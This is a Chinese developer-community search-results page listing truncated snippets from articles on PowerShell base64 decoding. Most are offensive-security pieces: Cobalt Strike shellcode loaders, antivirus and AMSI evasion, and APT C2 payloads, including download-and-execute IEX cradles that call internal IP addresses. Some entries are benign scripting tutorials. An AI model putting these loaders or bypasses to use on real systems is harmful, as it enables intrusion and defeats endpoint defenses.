[io.memorystream][system.convert]::frombase64string - 腾讯云开发者社区

文章/答案/技术大牛

发布

从一个恶意活动中学习 PowerShell 解码

1 第一层 – Episode 1 这个字符串可以使用 CyberChef 来解码，其中包含大量用于编码和解码的小工具：解码后如下： $s=New-Object IO.MemoryStream(,[...IP，可识别的端口号或像 DoEvilStuff() 和 DestoryTheResistance() 之类的函数，但在结尾处有一长串字符也许能探索出东西来： [Byte[]]$var_code = [System.Convert...]::FromBase64String("/OiJAAAAYInlMdJ..ENUFF_IS_ENUFF_I_QUIT..jEwOAA=") 同样用 CyberChef 来解码，如下图所示：解码出来的已不在是...有时候使用正常的解码看不到 IP 地址，上面的示例非常简单，但是为了演示起见，可能会在 ShellCode 之后找到类似的代码： [Byte[]]$var_code = [System.Convert]...::FromBase64String('38u[Redacted_Chracters_CMjIyMg') for ($x = 0; $x -lt $var_code.Count; $x++) { $

1.2K4 0

Cobalt Strike Powershell 过360+Defender等杀软上线

SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert...]::FromBase64String('此处为shellcode，太长就不复制出来了') for ($x = 0; $x -lt $var_code.Count; $x++) { $var_code...0x02 Powershell免杀现在把FromBase64String改成FromBase65String，那就解决掉FromBase64String，直接改成byte数组。...$string = '' $s = [Byte[]]$var_code = [System.Convert]::FromBase64String('【cs生成的shellcode】') $s |foreach...使用上面方法，直接把FromBase64String改成FromBase65String。

3.2K2 0

您找到你想要的搜索结果了吗？

是的

没有找到

PowerShell随机免杀结合ps2exe上线

格式应该如下 $payload='原先powershell.ps1中内容base64编码后的内容' $testforwindow=[System.Text.Encoding]::UTF8.GetString([System.Convert...]::FromBase64String($payload) If ([IntPtr]::size -eq 8) { IEX $testforwindow } 按照这种思路,也是可以上线的,但是免杀效果不理想...$payload1='原先编码的某一部分' $payload2='原先编码的另一部分' $testforwindow=[System.Text.Encoding]::UTF8.GetString([System.Convert...]::FromBase64String($payload1+$payload2) If ([IntPtr]::size -eq 8) { IEX $testforwindow } 按照这种思路我们进行了尝试...]::FromBase64String("+Long_str+")) \n") payload.writelines("If ([IntPtr]::size -eq 8) {"+'\n'

1.2K3 0

Powershell免杀从入门到实践

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("xxx"));IEX (New-Object IO.StreamReader(New-Object...$enc=[System.Convert]::FromBase64String('base64编码字符串')for ($x = 0; $x -lt $enc.Count; $x++) { $enc

3.3K3 0

“污水”（MuddyWater）APT组织C2工具MuddyC3浅析

:---+Powershell JOB Payload+---Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert...]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMTY4LjIuMTE0OjQ0NDQvZ2V0Jyk7SUVYKCRzKQ...Process Payload+---Start-Process powershell -ArgumentList "iex([System.Text.Encoding]::ASCII.GetString([System.Convert...WindowStyle Hidden (HIGH):---+Powershell JOB + File Payload+---iex([System.Text.Encoding]::ASCII.GetString([System.Convert...=='))) ---+Powershell JOB + File +SCT Payload+---iex([System.Text.Encoding]::ASCII.GetString([System.Convert

1.4K2 0

神兵利器 - PowerShx 不受软件限制运行Powershell

amsi"]); } 例子运行 base64 编码的脚本 rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert...]::FromBase64String("BASE64")) ^| iex PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert...]::FromBase64String("BASE64")) ^| iex 注意：Empire stagers 需要使用 [System.Text.Encoding]::Unicode 解码运行 base64

1.2K4 0

如何使用PowerShx摆脱软件限制运行PowerShell

"]); } 工具使用样例 1、运行Base64编码的脚本 rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert...]::FromBase64String("BASE64")) ^| iex PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert...]::FromBase64String("BASE64")) ^| iex 注意：我们需要使用[System.Text.Encoding]::Unicode对Empire Stager进行解码。

2.2K1 0

使用microsoft绕过360等AV

=END)");m = r.Match(wro.rawcontent);if(m.Success){ p = [System.Text.Encoding]::UTF8.GetString([System.Convert...]::FromBase64String(m.value));iex 记得在编码后的内容前面加上START和END这样方便匹配，然后powershell执行上面的语句 ?...m = $r.Match($wro.rawcontent);->正则匹配，创建变量m if($m.Success){ $p =System.Text.Encoding::UTF8.GetString(System.Convert...::FromBase64String($m.value));...}

2.4K2 0

Follina .html文件免杀

$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]+[char]+'Unicode.GetString([System.Convert...]'+[char]+[char]+'FromBase64String('+[char]+'YwBhAGwAYwA='+[char]+'))')))) 这一段是上面中<powershell_payload...powershell执行先看第二个Invoke-Expression()中的内容 '[System.Text.Encoding]'+[char]+[char]+'Unicode.GetString([System.Convert...]'+[char]+[char]+'FromBase64String('+[char]+'YwBhAGwAYwA='+[char]+'))' 这一段等价于 [System.Text.Encoding]...::Unicode.GetString([System.Covert]::FromBase64String("YwBhAGwAYwA")) 他的作用是，将YwBhAGwAYwA这串base64转成字符串

1K1 0

云桌面文件上传限制绕过

fscan64.exe编码输出未txt文本程序 $PEBytes = [System.IO.File]::ReadAllBytes("fscan64.exe") $Base64Payload = [System.Convert...fscan_base64.txt进行base解码并从中还原处fscan64.exe $Base64Bytes = Get-Content ("fscan_base64.txt") $PEBytes= [System.Convert...]::FromBase64String($Base64Bytes) [System.IO.File]::WriteAllBytes("fscan_base64.exe",$PEBytes) Step

4.7K1 0

内网渗透之云桌面文件上传限制绕过

5181 0

一些有趣的powershell加载命令

PowerBreach的DNS TXT方法要执行的代码必须是存储在TXT记录中的base64编码的字符串 IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert...]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0])))) <#

1.8K1 0

CS Powershell Beacon分析

[Byte[]]$var_code = [System.Convert]::FromBase64String('bnlicXZrqsZros8DIy 例如： $ EncodedText =“VABoAGkAcwAgAGkAcwAgAGEAIABzAGUAYwByAGUAdAAgAGEAbgBkACAAcwBoAG8AdQBsAGQAIABiAGUAIABoAGkAZABlAG4A...” $ DecodedText = [System.Text.Encoding] :: Unicode.GetString（[System.Convert] :: FromBase64String（$

2K2 0

AMSI调试及绕过

+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField...($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA...function b64decode { param ($encoded) $decoded = $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert...]::FromBase64String($en coded)) return $decoded } $1 = b64decode("U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM

1.4K1 0

如何使用Powershell操作FTP进行数据文件自动上传备份

# 编码 $bytes = [System.Text.Encoding]::Unicode.GetBytes("weiyigeek") $str = [System.Convert]::ToBase64String...echo $str # 解码 $str = "VwBlAGkAeQBpAEcAZQBlAGsAZQByAA==" [System.Text.Encoding]::ASCII.GetString([System.Convert...]::FromBase64String($str)) [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String

4.2K2 1

【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑

Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert...]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../..

5501 0

记一次PowerShell配合Metersploit的艰难提权

"; } if ($ByteArray) { $Base64String = [System.Convert]::ToBase64String($ByteArray...New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/res.txt") 靶机解码payload $PEBytes = [System.Convert...]::FromBase64String($InputString) 反射调用 Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR msf

1K1 0

从远程桌面服务到获取Empire Shell

\ReflectivePick_x64.dll -Encoding Byte $Encoded = [System.Convert]::ToBase64String($Content) $Encoded...$dllData = "DLLBASE64_GOES_HERE" $ProcId = (Get-Process explorer).Id $Bytes = [System.Convert]::FromBase64String

2.4K4 0

创建腾讯云Windows云服务器时在UserData中设计开机校验打印服务的逻辑

JHNlcnZpY2VOYW1lID0gIlNwb29sZXIiCiRzZXJ2aWNlID0gR2V0LVNlcnZpY2UgLU5hbWUgJHNlcnZpY2VOYW1lCgppZiAoJHNlcnZpY2UuU3RhcnRUeXBlIC1uZSAiQXV0b21hdGljIikgewogICAgU2V0LVNlcnZpY2UgLU5hbWUgJHNlcnZpY2VOYW1lIC1TdGFydHVwVHlwZSBBdXRvbWF0aWMKICAgIFdyaXRlLUhvc3QgIlRoZSAnJHNlcnZpY2VOYW1lJyBzZXJ2aWNlIHN0YXJ0dXAgdHlwZSBoYXMgYmVlbiBzZXQgdG8gJ0F1dG9tYXRpYycuIgp9IGVsc2UgewogICAgV3JpdGUtSG9zdCAiVGhlICckc2VydmljZU5hbWUnIHNlcnZpY2UgaXMgYWxyZWFkeSBzZXQgdG8gc3RhcnQgYXV0b21hdGljYWxseS4iCn0KCmlmICgkc2VydmljZS5TdGF0dXMgLW5lICJSdW5uaW5nIikgewogICAgU3RhcnQtU2VydmljZSAtTmFtZSAkc2VydmljZU5hbWUKICAgIFdyaXRlLUhvc3QgIlRoZSAnJHNlcnZpY2VOYW1lJyBzZXJ2aWNlIGhhcyBiZWVuIHN0YXJ0ZWQuIgp9IGVsc2UgewogICAgV3JpdGUtSG9zdCAiVGhlICckc2VydmljZU5hbWUnIHNlcnZpY2UgaXMgYWxyZWFkeSBydW5uaW5nLiIKfQ==" $decodedContent = [System.Convert...]::FromBase64String($base64String) $scriptContent = [System.Text.Encoding]::UTF8.GetString($decodedContent

1.2K1 0

如何利用oneNote钓鱼？

这段的大概意思就是，使用了 .NET Framework 中的 System.Text.Encoding 和 System.Convert 类。...FromBase64String 方法是 System.Convert 类中的一个方法，它接收一个 Base64 编码的字符串，并返回其对应的字节数组。

1.3K3 0

点击加载更多

从一个恶意活动中学习 PowerShell 解码

Cobalt Strike Powershell 过360+Defender等杀软上线

PowerShell随机免杀结合ps2exe上线

Powershell免杀从入门到实践

“污水”（MuddyWater）APT组织C2工具MuddyC3浅析

神兵利器 - PowerShx 不受软件限制运行Powershell

如何使用PowerShx摆脱软件限制运行PowerShell

使用microsoft绕过360等AV

Follina .html文件免杀

云桌面文件上传限制绕过

内网渗透之云桌面文件上传限制绕过

一些有趣的powershell加载命令

CS Powershell Beacon分析

AMSI调试及绕过

如何使用Powershell操作FTP进行数据文件自动上传备份

【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑

记一次PowerShell配合Metersploit的艰难提权

从远程桌面服务到获取Empire Shell

创建腾讯云Windows云服务器时在UserData中设计开机校验打印服务的逻辑

如何利用oneNote钓鱼？

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐